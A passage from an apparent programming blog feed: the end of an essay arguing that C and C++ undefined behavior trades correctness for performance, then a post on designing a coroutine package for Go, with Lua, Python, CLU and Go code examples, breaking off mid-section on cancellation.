memory. This is not hypothetical. It happens enough in practice to be a <a href="https://stackoverflow.com/questions/18291620/why-will-stdsort-crash-if-the-comparison-function-is-not-as-operator">popular question on StackOverflow</a>. <p> As a final note, it turns out that <code>operator&lt;</code> is not a valid comparison function on floating-point numbers if NaNs are involved, because: <ul> <li> 1 &lt; NaN and NaN &lt; 1 are both false, implying NaN == 1. <li> 2 &lt; NaN and NaN &lt; 2 are both false, implying NaN == 2. <li> Since NaN == 1 and NaN == 2, 1 == 2, yet 1 &lt; 2 is true.</ul> <p> Programming with NaNs is never pleasant, but it seems particularly extreme to allow <code>std::sort</code> to crash when handed one. <a class=anchor href="#reveal"><h2 id="reveal">Reflections and revealed preferences</h2></a> <p> Looking over these examples, it could not be more obvious that in modern C and C++, performance is job one and correctness is job two. To a C/C++ compiler, a programmer making a mistake and (gasp!) compiling a program containing a bug is just not a concern. Rather than have the compiler point out the bug or at least compile the code in a clear, understandable, debuggable manner, the approach over and over again is to let the compiler do whatever it likes, in the name of performance. <p> This may not be the wrong decision for these languages. There are undeniably power users for whom every last bit of performance translates to very large sums of money, and I don’t claim to know how to satisfy them otherwise. On the other hand, this performance comes at a significant development cost, and there are probably plenty of people and companies who spend more than their performance savings on unnecessarily difficult debugging sessions and additional testing and sanitizing. It also seems like there must be a middle ground where programmers retain most of the control they have in C and C++ but the program doesn’t crash when sorting NaNs or behave arbitrarily badly if you accidentally dereference a null pointer. Whatever the merits, it is important to see clearly the choice that C and C++ are making. <p> In the case of arithmetic overflow, later drafts of the proposal removed the defined behavior for wrapping, explaining:<blockquote> <p> The main change between [P0907r0] and the subsequent revision is to maintain undefined behavior when signed integer overflow occurs, instead of defining wrapping behavior. This direction was motivated by: <ul> <li> Performance concerns, whereby defining the behavior prevents optimizers from assuming that overflow never occurs; <li> Implementation leeway for tools such as sanitizers; <li> Data from Google suggesting that over 90% of all overflow is a bug, and defining wrapping behavior would not have solved the bug.</ul> </blockquote> <p> Again, performance concerns rank first. I find the third item in the list particularly telling. I’ve known C/C++ compiler authors who got excited about a 0.1% performance improvement, and incredibly excited about 1%. Yet here we have an idea that would change 10% of affected programs from incorrect to correct, and it is rejected, because performance is more important. <p> The argument about sanitizers is more nuanced. Leaving a behavior undefined allows any implementation at all, including reporting the behavior at runtime and stopping the program. True, the widespread use of undefined behavior enables sanitizers like ThreadSanitizer, MemorySanitizer, and UBSan, but so would defining the behavior as “either this specific behavior, or a sanitizer report.” If you believed correctness was job one, you could define overflow to wrap, fixing the 10% of programs outright and making the 90% behave at least more predictably, and then at the same time define that overflow is still a bug that can be reported by sanitizers. You might object that requiring wrapping in the absence of a sanitizer would hurt performance, and that’s fine: it’s just more evidence that performance trumps correctness. <p> One thing I find surprising, though, is that correctness gets ignored even when it clearly doesn’t hurt performance. It would certainly not hurt performance to emit a compiler warning about deleting the <code>if</code> statement testing for signed overflow, or about optimizing away the possible null pointer dereference in <code>Do()</code>. Yet I could find no way to make compilers report either one; certainly not <code>-Wall</code>. <p> The explanatory shift from non-portable to optimizable also seems revealing. As far as I can tell, C89 did not use performance as a justification for any of its undefined behaviors. They were non-portabilities, like signed overflow and null pointer dereferences, or they were outright bugs, like use-after-free. But now experts like Chris Lattner and Hans Boehm point to optimization potential, not portability, as justification for undefined behaviors. I conclude that the rationales really have shifted from the mid-1980s to today: an idea that meant to capture non-portability has been preserved for performance, trumping concerns like correctness and debuggability. <p> Occasionally in Go we have <a href="https://go.dev/blog/compat#input">changed library functions to remove surprising behavior</a>, It’s always a difficult decision, but we are willing to break existing programs depending on a mistake if correcting the mistake fixes a much larger number of programs. I find it striking that the C and C++ standards committees are willing in some cases to break existing programs if doing so merely <i>speeds up</i> a large number of programs. This is exactly what happened with the infinite loops. <p> I find the infinite loop example telling for a second reason: it shows clearly the escalation from non-portable to optimizable. In fact, it would appear that if you want to break C++ programs in service of optimization, one possible approach is to just do that in a compiler and wait for the standards committee to notice. The de facto non-portability of whatever programs you have broken can then serve as justification for undefining their behavior, leading to a future version of the standard in which your optimization is legal. In the process, programmers have been handed yet another footgun to try to avoid setting off. <p> (A common counterargument is that the standards committee cannot force existing implementations to change their compilers. This doesn’t hold up to scrutiny: every new feature that gets added is the standards committee forcing existing implementations to change their compilers.) <p> I am not claiming that anything should change about C and C++. I just want people to recognize that the current versions of these sacrifice correctness for performance. To some extent, all languages do this: there is almost always a tradeoff between performance and slower, safer implementations. Go has data races in part for performance reasons: we could have done everything by message copying or with a single global lock instead, but the performance wins of shared memory were too large to pass up. For C and C++, though, it seems no performance win is too small to trade against correctness. <p> As a programmer, you have a tradeoff to make too, and the language standards make it clear which side they are on. In some contexts, performance is the dominant priority and nothing else matters quite as much. If so, C or C++ may be the right tool for you. But in most contexts, the balance flips the other way. If programmer productivity, debuggability, reproducible bugs, and overall correctness and understandability are more important than squeezing every last little bit of performance, then C and C++ are not the right tools for you. I say this with some regret, as I spent many years happily writing C programs. <p> I have tried to avoid exaggerated, hyperbolic language in this post, instead laying out the tradeoff and the preferences revealed by the decisions being made. John Regehr wrote a less restrained series of posts about undefined behavior a decade ago, and in <a href="https://blog.regehr.org/archives/226">one of them</a> he concluded:<blockquote> <p> It is basically evil to make certain program actions wrong, but to not give developers any way to tell whether or not their code performs these actions and, if so, where. One of C’s design points was “trust the programmer.” This is fine, but there’s trust and then there’s trust. I mean, I trust my 5 year old but I still don’t let him cross a busy street by himself. Creating a large piece of safety-critical or security-critical code in C or C++ is the programming equivalent of crossing an 8-lane freeway blindfolded.</blockquote> <p> To be fair to C and C++, if you set yourself the goal of crossing an 8-lane freeway blindfolded, it does make sense to focus on doing it as fast as you possibly can. Coroutines for Go tag:research.swtch.com,2012:research.swtch.com/coro 2023-07-17T14:00:00-04:00 2023-07-17T14:02:00-04:00 Why we need coroutines for Go, and what they might look like. <p> This post is about why we need a coroutine package for Go, and what it would look like. But first, what are coroutines? <p> Every programmer today is familiar with function calls (subroutines): F calls G, which stops F and runs G. G does its work, potentially calling and waiting for other functions, and eventually returns. When G returns, G is gone and F continues running. In this pattern, only one function is running at a time, while its callers wait, all the way up the call stack. <p> In contrast to subroutines, coroutines run concurrently on different stacks, but it’s still true that only one is running at a time, while its caller waits. F starts G, but G does not run immediately. Instead, F must explicitly <i>resume</i> G, which then starts running. At any point, G may turn around and <i>yield</i> back to F. That pauses G and continues F from its resume operation. Eventually F calls resume again, which pauses F and continues G from its yield. On and on they go, back and forth, until G returns, which cleans up G and continues F from its most recent resume, with some signal to F that G is done and that F should no longer try to resume G. In this pattern, only one coroutine is running at a time, while its caller waits on a different stack. They take turns in a well-defined, coordinated manner. <p> This is a bit abstract. Let’s look at real programs. <a class=anchor href="#lua"><h2 id="lua">Coroutines in Lua</h2></a> <p> To use a <a href="pcdata#gopher">venerable example</a>, consider comparing two binary trees to see if they have the same value sequence, even if their structures are different. For example, here is code in <a href="https://lua.org">Lua 5</a> to generate some binary trees: <pre>function T(l, v, r) return {left = l, value = v, right = r} end e = nil t1 = T(T(T(e, 1, e), 2, T(e, 3, e)), 4, T(e, 5, e)) t2 = T(e, 1, T(e, 2, T(e, 3, T(e, 4, T(e, 5, e))))) t3 = T(e, 1, T(e, 2, T(e, 3, T(e, 4, T(e, 6, e))))) </pre> <p> The trees <code>t1</code> and <code>t2</code> both contain the values 1, 2, 3, 4, 5; <code>t3</code> contains 1, 2, 3, 4, 6. <p> We can write a coroutine to walk over a tree and yield each value: <pre>function visit(t) if t ~= nil then -- note: ~= is "not equal" visit(t.left) coroutine.yield(t.value) visit(t.right) end end </pre> <p> <p> Then to compare two trees, we can create two visit coroutines and alternate between them to read and compare successive values: <pre>function cmp(t1, t2) co1 = coroutine.create(visit) co2 = coroutine.create(visit) while true do ok1, v1 = coroutine.resume(co1, t1) ok2, v2 = coroutine.resume(co2, t2) if ok1 ~= ok2 or v1 ~= v2 then return false end if not ok1 and not ok2 then return true end end end </pre> <p> The <code>t1</code> and <code>t2</code> arguments to <code>coroutine.resume</code> are only used on the first iteration, as the argument to <code>visit</code>. Subsequent resumes return that value from <code>coroutine.yield</code>, but the code ignores the value. <p> A more idiomatic Lua version would use <code>coroutine.wrap</code>, which returns a function that hides the coroutine object: <pre><span style="color: #aaa">function cmp(t1, t2)</span> next1 = coroutine.wrap(function() visit(t1) end) next2 = coroutine.wrap(function() visit(t2) end) <span style="color: #aaa"> while true</span> <span style="color: #aaa"> do</span> v1 = next1() v2 = next2() if v1 ~= v2 then <span style="color: #aaa"> return false</span> <span style="color: #aaa"> end</span> if v1 == nil and v2 == nil then <span style="color: #aaa"> return true</span> <span style="color: #aaa"> end</span> <span style="color: #aaa"> end</span> <span style="color: #aaa">end</span> </pre> <p> When the coroutine has finished, the <code>next</code> function returns <code>nil</code> (<a href="https://gist.github.com/rsc/5908886288b741b847a83c0c6597c690">full code</a>). <a class=anchor href="#python"><h2 id="python">Generators in Python (Iterators in CLU)</h2></a> <p> Python provides generators that look a lot like Lua’s coroutines, but they are not coroutines, so it’s worth pointing out the differences. The main difference is that the “obvious” programs don’t work. For example, here’s a direct translation of our Lua tree and visitor to Python: <pre>def T(l, v, r): return {'left': l, 'value': v, 'right': r} def visit(t): if t is not None: visit(t['left']) yield t['value'] visit(t['right']) </pre> <p> But this obvious translation doesn’t work: <pre>&gt;&gt;&gt; e = None &gt;&gt;&gt; t1 = T(T(T(e, 1, e), 2, T(e, 3, e)), 4, T(e, 5, e)) &gt;&gt;&gt; for x in visit(t1): ... print(x) ... 4 &gt;&gt;&gt; </pre> <p> We lost 1, 2, 3, and 5. What happened? <p> In Python, that <code>def visit</code> does not define an ordinary function. Because the body contains a <code>yield</code> statement, the result is a generator instead: <pre>&gt;&gt;&gt; type(visit(t1)) &lt;class 'generator'&gt; &gt;&gt;&gt; </pre> <p> The call <code>visit(t['left'])</code> doesn’t run the code in <code>visit</code> at all. It only creates and returns a new generator, which is then discarded. To avoid discarding those results, you have to loop over the generator and re-yield them: <pre><span style="color: #aaa"></span> <span style="color: #aaa">def visit(t):</span> <span style="color: #aaa"> if t is not None:</span> for x in visit(t[&#39;left&#39;]): yield x <span style="color: #aaa"> yield t[&#39;value&#39;]</span> for x in visit(t[&#39;right&#39;]) yield x </pre> <p> Python 3.3 introduced <code>yield</code> <code>from</code>, allowing: <pre><span style="color: #aaa">def visit(t):</span> <span style="color: #aaa"> if t is not None:</span> yield from visit(t[&#39;left&#39;]): <span style="color: #aaa"> yield t[&#39;value&#39;]</span> yield from visit(t[&#39;right&#39;]) </pre> <p> The generator object contains the state of the single call to <code>visit</code>, meaning local variable values and which line is executing. That state is pushed onto the call stack each time the generator is resumed and then popped back into the generator object at each <code>yield</code>, which can only occur in the top-most call frame. In this way, the generator uses the same stack as the original program, avoiding the need for a full coroutine implementation but introducing these confusing limitations instead. <p> Python’s generators appear to be almost exactly copied from CLU, which pioneered this abstraction (and so many other things), although CLU calls them iterators, not generators. A CLU tree iterator looks like: <pre>visit = iter (t: cvt) yields (int): tagcase t tag empty: ; tag non_empty(t: node): for x: int in tree$visit(t.left) do yield(x); end; yield(t.value); for x: int in tree$visit(t.right) do yield(x); end; end; end visit; </pre> <p> The syntax is different, especially the <code>tagcase</code> that is examining a tagged union representation of a tree, but the basic structure, including the nested <code>for</code> loops, is exactly the same as our first working Python version. Also, because CLU was statically typed, <code>visit</code> is clearly marked as an iterator (<code>iter</code>) not a function (<code>proc</code> in CLU). Thanks to that type information, misuse of <code>visit</code> as an ordinary function call, like in our buggy Python example, is something that the compiler could (and I assume did) diagnose. <p> About CLU’s implementation, the original implementers wrote, “Iterators are a form of coroutine; however, their use is sufficiently constrained that they are implemented using just the program stack. Using an iterator is therefore only slightly more expensive than using a procedure.” This sounds exactly like the explanation I gave above for the Python generators. For more, see Barbara Liskov <i>et al.</i>’s 1977 paper “<a href="https://dl.acm.org/doi/10.1145/359763.359789">Abstraction Mechanisms in CLU</a>”, specifically sections 4.2, 4.3, and 6. <a class=anchor href="#thread"><h2 id="thread">Coroutines, Threads, and Generators</h2></a> <p> At first glance, coroutines, threads, and generators look alike. All three provide <a href="pcdata">concurrency</a> in one form or another, but they differ in important ways. <ul> <li> <p> Coroutines provide concurrency without parallelism: when one coroutine is running, the one that resumed it or yielded to it is not. <p> Because coroutines run one at a time and only switch at specific points in the program, the coroutines can share data among themselves without races. The explicit switches (<code>coroutine.resume</code> in the first Lua example or calling a <code>next</code> function in the second Lua example) serve as synchronization points, creating <a href="gomm#gos_memory_model_today">happens-before edges</a>. <p> Because scheduling is explicit (without any preemption) and done entirely without the operating system, a coroutine switch takes at most around ten nanoseconds, usually even less. Startup and teardown is also much cheaper than threads. <li> <p> Threads provide more power than coroutines, but with more cost. The additional power is parallelism, and the cost is the overhead of scheduling, including more expensive context switches and the need to add preemption in some form. Typically the operating system provides threads, and a thread switch takes a few microseconds. <p> For this taxonomy, Go’s goroutines are cheap threads: a goroutine switch is closer to a few hundred nanoseconds, because the Go runtime takes on some of the scheduling work, but goroutines still provide the full parallelism and preemption of threads. (Java’s new lightweight threads are basically the same as goroutines.) <li> <p> Generators provide less power than coroutines, because only the top-most frame in the coroutine is allowed to yield. That frame is moved back and forth between an object and the call stack to suspend and resume it.</ul> <p> Coroutines are a useful building block for writing programs that want concurrency for program structuring but not for parallelism. For one detailed example of that, see my previous post, “<a href="pcdata">Storing Data in Control Flow</a>”. For other examples, see Ana Lúcia De Moura and Roberto Ierusalimschy’s 2009 paper “<a href="https://dl.acm.org/doi/pdf/10.1145/1462166.1462167">Revisiting Coroutines</a>”. For the original example, see Melvin Conway’s 1963 paper “<a href="https://dl.acm.org/doi/pdf/10.1145/366663.366704">Design of a Separable Transition-Diagram Compiler</a>”. <a class=anchor href="#why"><h2 id="why">Why Coroutines in Go?</h2></a> <p> Coroutines are a concurrency pattern not directly served by existing Go concurrency libraries. Goroutines are often close enough, but as we saw, they are not the same, and sometimes that difference matters. <p> For example, Rob Pike’s 2011 talk “<a href="https://go.dev/talks/2011/lex.slide">Lexical Scanning in Go</a>” presents the original lexer and parser for the <a href="https://go.dev/pkg/text/template">text/template package</a>. They ran in separate goroutines connected by a channel, imperfectly simulating a pair of coroutines: the lexer and parser ran in parallel, with the lexer looking ahead to the next token while the parser processed the most recent one. Generators would not have been good enough—the lexer yields values from many different functions—but full goroutines proved to be a bit too much. The parallelism provided by the goroutines caused races and eventually led to abandoning the design in favor of the lexer storing state in an object, which was a more faithful simulation of a coroutine. Proper coroutines would have avoided the races and been more efficient than goroutines. <p> An anticipated future use case for coroutines in Go is iteration over generic collections. We have discussed adding support to Go for <a href="https://github.com/golang/go/discussions/56413">ranging over functions</a>, which would encourage authors of collections and other abstractions to provide CLU-like iterator functions. Iterators can be implemented today using function values, without any language changes. For example, a slightly simplified tree iterator in Go could be: <pre>func (t *Tree[V]) All(yield func(v V)) { if t != nil { t.left.All(yield) yield(t.value) t.right.All(yield) } } </pre> <p> That iterator can be invoked today as: <pre>t.All(func(v V) { fmt.Println(v) }) </pre> <p> and perhaps a variant could be invoked in a future version of Go as: <pre>for v := range t.All { fmt.Println(v) } </pre> <p> Sometimes, however, we want to iterate over a collection in a way that doesn’t fit a single <code>for</code> loop. The binary tree comparison is an example of this: the two iterations need to be interlaced somehow. As we’ve already seen, coroutines would provide an answer, letting us turn a function like <code>(*Tree).All</code> (a “push” iterator) into a function that returns a stream of values, one per call (a “pull” iterator). <a class=anchor href="#how"><h2 id="how">How to Implement Coroutines in Go</h2></a> <p> If we are to add coroutines to Go, we should aim to do it without language changes. That means the definition of coroutines should be possible to implement and understand in terms of ordinary Go code. Later, I will argue for an optimized implementation provided directly by the runtime, but that implementation should be indistinguishable from the pure Go definition. <p> Let’s start with a very simple version that ignores the yield operation entirely. It just runs a function in another goroutine: <pre>package coro func New[In, Out any](f func(In) Out) (resume func(In) Out) { cin := make(chan In) cout := make(chan Out) resume = func(in In) Out { cin &lt;- in return &lt;-cout } go func() { cout &lt;- f(&lt;-cin) }() return resume } </pre> <p> <code>New</code> takes a function <code>f</code> which must have one argument and one result. <code>New</code> allocates channels, defines <code>resume</code>, creates a goroutine to run <code>f</code>, and returns the <code>resume</code> funtion. The new goroutine blocks on <code>&lt;-cin</code>, so there is no opportunity for parallelism. The <code>resume</code> function unblocks the new goroutine by sending an <code>in</code> value and then blocks receiving an <code>out</code> value. This send-receive pair makes a coroutine switch. We can use <code>coro.New</code> like this (<a href="https://go.dev/play/p/gLhqAutT9Q4">full code</a>): <pre>func main() { resume := coro.New(strings.ToUpper) fmt.Println(resume("hello world")) } </pre> <p> So far, <code>coro.New</code> is just a clunky way to call a function. We need to add <code>yield</code>, which we can pass as an argument to <code>f</code>: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) Out) { <span style="color: #aaa"></span> <span style="color: #aaa"> cin := make(chan In)</span> <span style="color: #aaa"> cout := make(chan Out)</span> <span style="color: #aaa"> resume = func(in In) Out {</span> <span style="color: #aaa"> cin &lt;- in</span> <span style="color: #aaa"> return &lt;-cout</span> <span style="color: #aaa"> }</span> yield := func(out Out) In { cout &lt;- out return &lt;-cin } go func() { cout &lt;- f(&lt;-cin, yield) }() <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> Note that there is still no parallelism here: <code>yield</code> is another send-receive pair. These goroutines are constrained by the communication pattern to act indistinguishably from coroutines. <a class=anchor href="#parser"><h2 id="parser">Example: String Parser</h2></a> <p> Before we build up to iterator conversion, let’s look at a few simpler examples. In “<a href="pcdata">Storing Data in Control Flow</a>,” we considered the problem of taking a function <pre>func parseQuoted(read func() byte) bool </pre> <p> and running it in a separate control flow so that bytes can be provided one at a time to a <code>Write</code> method. Instead of the ad hoc channel-based implementation in that post, we can use: <pre>type parser struct { resume func(byte) Status } func (p *parser) Init() { coparse := func(_ byte, yield func(Status) byte) Status { read := func() byte { return yield(NeedMoreInput) } if !parseQuoted(read) { return BadInput } return Success } p.resume = coro.New(coparse) p.resume(0) } func (p *parser) Write(c byte) Status { return p.resume(c) } </pre> <p> The <code>Init</code> funtion does all the work, and not much. It defines a function <code>coparse</code> that has the signature needed by <code>coro.New</code>, which means adding a throwaway input of type <code>byte</code>. That function defines a <code>read</code> that yields <code>NeedMoreInput</code> and then returns the byte provided by the caller. It then runs <code>parseQuoted(read)</code>, converting the boolean result to the usual status code. Having created a coroutine for <code>coparse</code> using <code>coro.New</code>, <code>Init</code> calls <code>p.resume(0)</code> to allow <code>coparse</code> to advance to the first read in <code>parseQuoted</code>. Finally the <code>Write</code> method is a trivial wrapper around <code>p.resume</code> (<a href="https://go.dev/play/p/MNGVPk11exV">full code</a>). <p> This setup abstracts away the pair of channels that we maintained by hand in the previous post, allowing us to work at a higher level as we write the program. <a class=anchor href="#sieve"><h2 id="sieve">Example: Prime Sieve</h2></a> <p> As a slightly larger example, consider <a href="https://www.cs.dartmouth.edu/~doug/sieve/sieve.pdf">Doug McIlroy’s concurrent prime sieve</a>. It consists of a pipeline of coroutines, one for each prime <code>p</code>, each running: <pre>loop: n = get a number from left neighbor if (p does not divide n) pass n to right neighbor </pre> <p> A counting coroutine on the leftmost side of the pipeline feeds the numbers 2, 3, 4, ... into the left end of the pipeline. A printing coroutines on the rightmost side can read primes out, print them, and create new filtering coroutines. The first filter in the pipeline removes multiples of 2, the next removes multiples of 3, the next removes multiples of 5, and so on. <p> The <code>coro.New</code> primitive we’ve created lets us take a straightforward loop that yields values and convert it into a function that can be called to obtain each value one at a time. Here is the counter: <pre>func counter() func(bool) int { return coro.New(func(more bool, yield func(int) bool) int { for i := 2; more; i++ { more = yield(i) } return 0 }) } </pre> <p> The counter logic is the function literal passed to <code>New</code>. It takes a yield function of type <code>func(int)</code> <code>bool</code>. The code yields a value by passing it to <code>yield</code> and then receives back a boolean saying whether to continue generating more numbers. When told to stop, either because <code>more</code> was false on entry or because a <code>yield</code> call returned false, the loop ends. It returns a final, ignored value, to satisfy the function type required by <code>New</code>. <p> <code>New</code> turns this into loop a function that is the inverse of <code>yield</code>: a <code>func(bool)</code> <code>int</code> that can be called with true to obtain the next value or with false to shut down the generator. The filtering coroutine is only slightly more complex: <pre>func filter(p int, next func(bool) int) (filtered func(bool) int) { return coro.New(func(more bool, yield func(int) bool) int { for more { n := next(true) if n%p != 0 { more = yield(n) } } return next(false) }) } </pre> <p> It takes a prime <code>p</code> and a <code>next</code> func connected to the coroutine on the left and then returns the filtered output stream to connect to the coroutine on the right. <p> Finally we have the printing coroutine: <pre>func main() { next := counter() for i := 0; i &lt; 10; i++ { p := next(true) fmt.Println(p) next = filter(p, next) } next(false) } </pre> <p> Starting with the counter, <code>main</code> maintains in <code>next</code> the output of the pipeline constructed so far. Then it loops: read a prime <code>p</code>, print <code>p</code>, and then add a new filter on the right end of the pipeline to remove multiples of <code>p</code> (<a href="https://go.dev/play/p/3OHQ_FHe_Na">full code</a>). <p> Notice that the calling relationship between coroutines can change over time: any coroutine C can call another coroutine D’s <code>next</code> function and become the coroutine that D yields to. The counter’s first <code>yield</code> goes to <code>main</code>, while its subsequent <code>yield</code>s go to the 2-filter. Similarly each <code>p</code>-filter <code>yield</code>s its first output (the next prime) to <code>main</code> while its subsequent <code>yield</code>s go to the filter for that next prime. <a class=anchor href="#goroutines"><h2 id="goroutines">Coroutines and Goroutines</h2></a> <p> In a certain sense, it is a misnomer to call these control flows coroutines. They are full goroutines, and they can do everything an ordinary goroutine can, including block waiting for mutexes, channels, system calls, and so on. What <code>coro.New</code> does is create goroutines with access to coroutine switch operations inside the <code>yield</code> and <code>resume</code> functions (which the sieve calls <code>next</code>). The ability to use those operations can even be passed to different goroutines, which is happening with <code>main</code> handing off each of its <code>next</code> streams to each successive <code>filter</code> goroutine. Unlike the <code>go</code> statement, <code>coro.New</code> adds new concurrency to the program <i>without</i> new parallelism. The goroutine that <code>coro.New(f)</code> creates can only run when some other goroutine explicitly loans it the ability to run using <code>resume</code>; that loan is repaid by <code>yield</code> or by <code>f</code> returning. If you have just one main goroutine and run 10 <code>go</code> statements, then all 11 goroutines can be running at once. In contrast, if you have one main goroutine and run 10 <code>coro.New</code> calls, there are now 11 control flows but the parallelism of the program is what it was before: only one runs at a time. Exactly which goroutines are paused in coroutine operations can vary as the program runs, but the parallelism never increases. <p> In short, <code>go</code> creates a new concurrent, <i>parallel</i> control flow, while <code>coro.New</code> creates a new concurrent, <i>non-parallel</i> control flow. It is convenient to continue to talk about the non-parallel control flows as coroutines, but remember that exactly which goroutines are “non-parallel” can change over the execution of a program, exactly the same way that which goroutines are receiving or sending from channels can change over the execution of a program. <a class=anchor href="#resume"><h2 id="resume">Robust Resumes</h2></a> <p> There are a few improvements we can make to <code>coro.New</code> so that it works better in real programs. The first is to allow <code>resume</code> to be called after the function is done: right now it deadlocks. Let’s add a bool result indicating whether <code>resume</code>’s result came from a yield. The <code>coro.New</code> implementation we have so far is: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) Out) { cin := make(chan In) cout := make(chan Out) resume = func(in In) Out { cin &lt;- in return &lt;-cout } yield := func(out Out) In { cout &lt;- out return &lt;-cin } go func() { cout &lt;- f(&lt;-cin, yield) }() return resume } </pre> <p> <p> To add this extra result, we need to track whether <code>f</code> is running and return that result from <code>resume</code>: <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool)) { <span style="color: #aaa"> cin := make(chan In)</span> <span style="color: #aaa"> cout := make(chan Out)</span> running := true resume = func(in In) (out Out, ok bool) { if !running { return } <span style="color: #aaa"> cin &lt;- in</span> out = &lt;-cout return out, running <span style="color: #aaa"> }</span> <span style="color: #aaa"> yield := func(out Out) In {</span> <span style="color: #aaa"> cout &lt;- out</span> <span style="color: #aaa"> return &lt;-cin</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> out := f(&lt;-cin, yield) running = false cout &lt;- out <span style="color: #aaa"> }()</span> <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> Note that since <code>resume</code> can only run when the calling goroutine is blocked, and vice versa, sharing the <code>running</code> variable is not a race. The two are synchronizing by taking turns executing. If <code>resume</code> is called after the coroutine has exited, <code>resume</code> returns a zero value and false. <p> Now we can tell when a goroutine is done (<a href="https://go.dev/play/p/Y2tcF-MHeYS">full code</a>): <pre>func main() { resume := coro.New(func(_ int, yield func(string) int) string { yield("hello") yield("world") return "done" }) for i := 0; i &lt; 4; i++ { s, ok := resume(0) fmt.Printf("%q %v\n", s, ok) } } $ go run cohello.go "hello" true "world" true "done" false "" false $ </pre> <a class=anchor href="#iterator"><h2 id="iterator">Example: Iterator Conversion</h2></a> <p> The prime sieve example showed direct use of <code>coro.New</code>, but the <code>more bool</code> argument was a bit awkward and does not match the iterator functions we saw before. Let’s look at converting any push iterator into a pull iterator using <code>coro.New</code>. We will need a way to terminate the coroutine running the push iterator if we want to stop early, so we will add a boolean result from <code>yield</code> indicating whether to continue, just like in the prime sieve: <pre>push func(yield func(V) bool) </pre> <p> The goal of the new function <code>coro.Pull</code> is to turn that push function into a pull iterator. The iterator will return the next value and a boolean indicating whether the iteration is over, just like a channel receive or map lookup: <pre>pull func() (V, bool) </pre> <p> If we want to stop the push iteration early, we need some way to signal that, so <code>Pull</code> will return not just the pull function but also a stop function: <pre>stop func() </pre> <p> Putting those together, the full signature of <code>Pull</code> is: <pre>func Pull[V any](push func(yield func(V) bool)) (pull func() (V, bool), stop func()) { ... } </pre> <p> The first thing <code>Pull</code> needs to do is start a coroutine to run the push iterator, and to do that it needs a wrapper function with the right type, namely one that takes a <code>more bool</code> to match the bool result from <code>yield</code>, and that returns a final <code>V</code>. The <code>pull</code> function can call <code>resume(true)</code>, while the <code>stop</code> function can call <code>resume(false)</code>: <pre>func Pull[V any](push func(yield func(V) bool)) (pull func() (V, bool), stop func()) { copush := func(more bool, yield func(V) bool) V { if more { push(yield) } var zero V return zero } resume := coro.New(copush) pull = func() (V, bool) { return resume(true) } stop = func() { resume(false) } return pull, stop } </pre> <p> That’s the complete implementation. With the power of <code>coro.New</code>, it took very little code and effort to build a nice iterator converter. <p> <p> To use <code>coro.Pull</code>, we need to redefine the tree’s <code>All</code> method to expect and use the new <code>bool</code> result from <code>yield</code>: <pre>func (t *Tree[V]) All(yield func(v V) bool) { t.all(yield) } func (t *Tree[V]) all(yield func(v V) bool) bool { return t == nil || t.Left.all(yield) &amp;&amp; yield(t.Value) &amp;&amp; t.Right.all(yield) } </pre> <p> Now we have everything we need to write a tree comparison function in Go (<a href="https://go.dev/play/p/hniFxnbXTgH">full code</a>): <pre>func cmp[V comparable](t1, t2 *Tree[V]) bool { next1, stop1 := coro.Pull(t1.All) next2, stop2 := coro.Pull(t2.All) defer stop1() defer stop2() for { v1, ok1 := next1() v2, ok2 := next2() if v1 != v2 || ok1 != ok2 { return false } if !ok1 &amp;&amp; !ok2 { return true } } } </pre> <p> <a class=anchor href="#panic"><h2 id="panic">Propagating Panics</h2></a> <p> Another improvement is to pass panics from a coroutine back to its caller, meaning the coroutine that most recently called <code>resume</code> to run it (and is therefore sitting blocked in <code>resume</code> waiting for it). Some mechanism to inform one goroutine when another panics is a very common request, but in general that can be difficult, because we don’t know which goroutine to inform and whether it is ready to hear that message. In the case of coroutines, we have the caller blocked waiting for news, so it makes sense to deliver news of the panic. <p> To do that, we can add a <code>defer</code> to catch a panic in the new coroutine and trigger it again in the <code>resume</code> that is waiting. <pre>type msg[T any] struct { panic any val T } <span style="color: #aaa"></span> <span style="color: #aaa">func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool)) {</span> <span style="color: #aaa"> cin := make(chan In)</span> cout := make(chan msg[Out]) <span style="color: #aaa"> running := true</span> <span style="color: #aaa"> resume = func(in In) (out Out, ok bool) {</span> <span style="color: #aaa"> if !running {</span> <span style="color: #aaa"> return</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> cin &lt;- in</span> m := &lt;-cout if m.panic != nil { panic(m.panic) } return m.val, running <span style="color: #aaa"> }</span> <span style="color: #aaa"> yield := func(out Out) In {</span> cout &lt;- msg[Out]{val: out} <span style="color: #aaa"> return &lt;-cin</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> defer func() { if running { running = false cout &lt;- msg[Out]{panic: recover()} } }() <span style="color: #aaa"> out := f(&lt;-cin, yield)</span> <span style="color: #aaa"> running = false</span> cout &lt;- msg[Out]{val: out} <span style="color: #aaa"> }()</span> <span style="color: #aaa"> return resume</span> <span style="color: #aaa">}</span> </pre> <p> <p> Let’s test it out (<a href="https://go.dev/play/p/Sihm8KVlTIB">full code</a>): <pre>func main() { defer func() { if e := recover(); e != nil { fmt.Println("main panic:", e) panic(e) } }() next, _ := coro.Pull(func(yield func(string) bool) { yield("hello") panic("world") }) for { fmt.Println(next()) } } </pre> <p> The new coroutine yields <code>hello</code> and then panics <code>world</code>. That panic is propagated back to the main goroutine, which prints the value and repanics. We can see that the panic appears to originate in the call to <code>resume</code>: <pre>% go run coro.go hello true main panic: world panic: world [recovered] panic: world goroutine 1 [running]: main.main.func1() /tmp/coro.go:9 +0x95 panic({0x108f360?, 0x10c2cf0?}) /go/src/runtime/panic.go:1003 +0x225 main.coro_New[...].func1() /tmp/coro.go.go:55 +0x91 main.Pull[...].func2() /tmp/coro.go.go:31 +0x1c main.main() /tmp/coro.go.go:17 +0x52 exit status 2 % </pre> <a class=anchor href="#cancel"><h2 id="cancel">Cancellation</h2></a> <p> Panic propagation takes care of telling the caller about an early coroutine exit, but what about telling a coroutine about an early caller exit? Analogous to the <code>stop</code> function in the pull iterator, we need some way to signal to the coroutine that it’s no longer needed, perhaps because the caller is panicking, or perhaps because the caller is simply returning. <p> To do that, we can change <code>coro.New</code> to return not just <code>resume</code> but also a 